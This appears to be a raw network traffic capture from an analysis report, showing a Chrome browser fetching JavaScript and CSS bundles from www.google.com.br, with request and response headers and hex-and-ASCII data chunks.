2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 39 39 36 0d 0a 59 6c 47 56 66 77 34 62 6b 79 39 53 35 46 31 55 44 31 47 4f 6d 6f 4e 50 76 48 71 4d 62 4e 2b 63 54 6a 6c 4a 2f 64 78 47 63 70 50 37 70 77 36 47 6a 48 70 6a 6e 32 4e 54 2f 6a 48 54 75 45 53 6a 6c 52 48 47 49 58 79 38 6a 6a 44 77 39 45 67 39 4d 56 70 61 41 48 67 59 36 5a 77 69 65 69 79 51 71 56 55 62 48 75 4d 52 6d 4c 57 65 31 76 64 68 6a 71 61 44 53 54 74 69 6f 61 58 53 62 32 78 30 48 6a 47 79 6a 63 6b 46 58 75 59 7a 78 69 31 47 71 68 74 68 59 59 36 69 68 43 6b 4e 73 51 4f 34 77 42 36 67 36 6c 68 79 75 6d 6b 6d 67 69 38 58 53 77 30 6f 53 43 47 76 7a 38 4e 6a 67 64 79 6b 43 46 4d 30 7a 4f 6c 6f 59 69 30 30 67 43 68 65 78 50 62 41 47 75 36 31 6f 36 44 4c 6e 6e 45 30 62 4c 32 43 68 72 36 76 64 37 72 69 2f 38 41 4c 47 56 5a 2f 77 42 53 56 56 64 Data Ascii: 996YlGVfw4bky9S5F1UD1GOmoNPvHqMbN+cTjlJ/dxGcpP7pw6GjHpjn2NT/jHTuESjlRHGIXy8jjDw9Eg9MVpaAHgY6ZwieiyQqVUbHuMRmLWe1vdhjqaDSTtioaXSb2x0HjGyjckFXuYzxi1GqhthYY6ihCkNsQO4wB6g6lhyumkmgi8XSw0oSCGvz8NjgdykCFM0zOloYi00gChexPbAGu61o6DLnnE0bL2Chr6vd7ri/8ALGVZ/wBSVVd
2024-07-04 17:43:06 UTC	1071	IN	Data Raw: 71 67 67 79 48 53 74 77 4c 62 4b 6f 55 66 51 44 46 4e 31 64 53 77 58 59 6d 35 76 65 33 35 37 59 39 55 4d 62 41 53 45 6a 6b 32 2b 6e 39 38 4d 30 76 43 4c 35 57 63 34 61 79 2f 4f 35 61 42 36 69 6d 38 43 6e 6d 68 63 52 75 79 54 4a 71 46 77 44 59 39 78 76 35 6d 77 38 35 61 79 31 75 56 77 54 74 70 74 4c 47 43 51 4f 77 50 50 31 78 6c 53 52 79 74 55 75 4f 34 59 67 2b 76 48 2b 4d 61 42 30 38 56 58 49 34 64 52 74 70 31 38 39 76 4d 63 41 71 49 44 44 65 79 77 71 49 71 64 53 35 76 56 30 75 61 31 37 4c 4d 43 78 51 30 37 62 41 68 6b 4b 36 62 57 2b 41 47 2f 71 4c 34 66 76 30 4c 68 42 6b 55 6b 37 4f 4e 55 6b 68 75 4c 39 72 66 6d 2f 7a 78 6c 58 55 4b 6d 71 72 5a 33 55 62 4f 39 39 75 66 54 47 6e 66 6f 30 68 4e 44 6b 4b 41 6c 72 79 4f 57 33 4e 78 38 73 4f 72 56 56 36 6b 39 Data Ascii: qggyHStwLbKoUfQDFN1dSwXYm5ve357Y9UMbASEjk2+n98M0vCL5Wc4ay/O5aB6im8CnmhcRuyTJqFwDY9xv5mw85ay1uVwTtptLGCQOwPP1xlSRytUuO4Yg+vH+MaB08VXI4dRtp189vMcAqIDDeywqIqdS5vV0ua17LMCxQ07bAhkK6bW+AG/qL4fv0LhBkUk7ONUkhuL9rfm/zxlXUKmqrZ3UbO99ufTGnfo0hNDkKAlryOW3Nx8sOrVV6k9
2024-07-04 17:43:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	1536	OUT	GET /xjs/_/js/md=10/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw HTTP/1.1 Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	830	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 146319 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 04 Jul 2024 12:19:43 GMT Expires: Fri, 04 Jul 2025 12:19:43 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 03 Jul 2024 22:17:06 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 19403 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:06 UTC	560	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 31 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 30 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"100001111111001111000100001011010000001111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 32 31 32 32 31 32 31 31 31 32 32 31 32 32 31 31 32 32 31 32 32 32 31 32 31 32 31 32 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 32 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 32 32 32 32 32 32 31 33 33 32 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 32 31 31 31 32 32 32 32 31 31 32 32 32 31 31 32 31 32 31 32 31 32 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 Data Ascii: 121212121212121212121212121222121212121212121222121221221211122122112212221212122221212121212121222122222222221221212122212121212121212121121112121212121212121212121212122222222213323333333333333333321112222112221121212121221212121212121211212121212121212
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 31 33 31 32 33 31 33 33 33 31 32 31 32 31 33 33 32 31 33 33 33 32 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 32 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 Data Ascii: 113123133312121332133321111111111111211111111111111111111111111111113211111111111111111111111111111311121311111111111111131111111311111111111111111111111111111112111212111111111111111111111111111111131111111111111111111121111111111111111111111111101111111
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 33 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 32 32 32 31 32 32 32 32 32 32 31 31 32 32 32 32 32 32 32 32 32 32 31 31 32 31 32 31 31 33 32 32 32 32 32 32 32 33 32 32 32 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 32 31 32 32 32 32 32 Data Ascii: 111111111111111111111111111111111122222221112222222222222222222111111111331111111111111111111011111111111111111111111111111111111111111111111111111113111111113133111111111111111131111112221222222112222222222112121132222222322231111111111111111111312122222
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 32 32 32 32 31 32 32 32 32 31 32 32 31 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 31 32 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 31 31 31 32 32 32 32 32 32 32 32 31 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 31 32 32 31 31 32 32 31 31 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 32 32 32 31 32 32 32 31 32 Data Ascii: 222212222122122222222122222222222222222222222212212111111111121111111111111111111122222222222222122222222221111222222221222211111111111111111111111211111111112121212121212121121212121211211111111111212222222222222212122112211222111111111111211111222122212
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 33 31 32 31 33 32 33 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 33 31 31 32 31 31 31 31 33 31 31 33 31 31 31 31 32 33 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 32 33 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 32 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 33 31 31 31 31 31 31 32 32 Data Ascii: 111111111111111111111111111111111111111111131111111111111111111111111111311312132311111111122222222222222222222222222222222222222311211113113111123113111111111111111111111111131112231131111111111111111111111111111131111111211111311111111111111112311111122
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 31 31 33 31 31 31 31 32 32 32 33 32 32 32 32 32 32 32 32 32 32 32 31 31 31 32 33 31 33 31 33 31 31 31 31 31 30 30 30 32 30 32 30 30 30 30 30 30 30 30 32 30 30 30 30 32 30 30 30 32 30 30 30 30 30 30 30 30 30 32 32 32 32 30 32 30 32 32 32 30 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 32 33 31 32 33 31 31 33 31 31 31 31 31 31 31 31 31 31 31 33 31 33 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 31 31 31 Data Ascii: 000002000000000000000000000000000000000000011111111111111111111111111111111111111111111222221131111222322222222222111231313111110002020000000020000200020000000002222020222022220000000000000111111112111111231231131111111111131311111113111111111111111133111
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 32 32 32 32 33 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 32 33 31 31 31 30 30 30 33 33 31 33 31 33 31 31 33 33 33 32 32 32 32 32 33 31 31 31 32 32 33 31 31 32 32 32 32 32 32 32 32 32 32 32 32 33 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 31 31 31 31 31 31 33 22 2c 22 6d 6f 64 75 6c 65 47 72 61 70 68 22 3a 22 64 24 71 75 61 6e 74 75 6d 2f 74 37 78 67 49 65 2f 77 73 39 54 6c 63 2f 63 45 74 39 30 62 2f 71 64 64 67 4b 65 2f 79 78 54 63 68 66 2f 2b 32 37 32 2f 3a 2f 2f 78 51 74 5a 62 3a 2c 2c 32 2f 2f 52 39 59 48 4a 63 3a 2c 33 2f 4b 55 4d 37 5a 2f 77 72 7a 45 58 62 2f 54 78 43 4a 66 64 2f 57 56 44 79 4b 65 2f 2f 56 6a 39 68 70 64 3a 2c 2f 74 61 66 50 72 Data Ascii: 23000000000000000000000002222223113110000000000023111000331313113332222231112231122222222222231111100000000000000131111113","moduleGraph":"d$quantum/t7xgIe/ws9Tlc/cEt90b/qddgKe/yxTchf/+272/://xQtZb:,,2//R9YHJc:,3/KUM7Z/wrzEXb/TxCJfd/WVDyKe//Vj9hpd:,/tafPr

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	3942	OUT	GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/ck=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=1/exm=SNUn3,cEt90b,cdos,csi,d,dtl0hd,eHDfl,hsm,jsa,mb4ZUb,qddgKe,sTsDMc/ed=1/dg=0/br=1/ujg=1/rs=ACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DULqB:RKfG5c;Dkk6ge:wJqrrd;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;Erl4fe:FloWmf;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IZrNqe:P8ha2c;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwH [TRUNCATED] Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	818	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 501723 Date: Thu, 04 Jul 2024 17:43:06 GMT Expires: Fri, 04 Jul 2025 17:43:06 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 03 Jul 2024 22:17:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:06 UTC	572	IN	Data Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6e 4e 4d 75 4f 64 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 63 6f 6e 74 61 69 6e 65 72 2d 72 6f 74 61 74 65 20 31 35 36 38 2e 32 33 35 32 39 34 31 31 37 36 6d 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 63 6f 6e 74 61 69 6e 65 72 2d Data Ascii: _F_installCss(".jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 72 65 64 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 73 6d 6f 63 73 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 66 69 6c 6c 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 79 65 6c 6c 6f 77 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 Data Ascii: -unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 30 25 7d 2e 46 63 58 66 69 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 34 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 25 7d 2e 53 50 4b 46 6d 63 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 2c 28 70 72 65 66 65 72 73 2d 63 6f 6e 74 72 61 73 74 3a 6d 6f 72 65 29 7b Data Ascii: tion:relative;width:50%}.FcXfi{box-sizing:border-box;height:100%;left:45%;overflow:hidden;position:absolute;top:0;width:10%}.SPKFmc{border-radius:50%;border:3px solid transparent;box-sizing:border-box}@media (forced-colors:active),(prefers-contrast:more){
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 7d 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 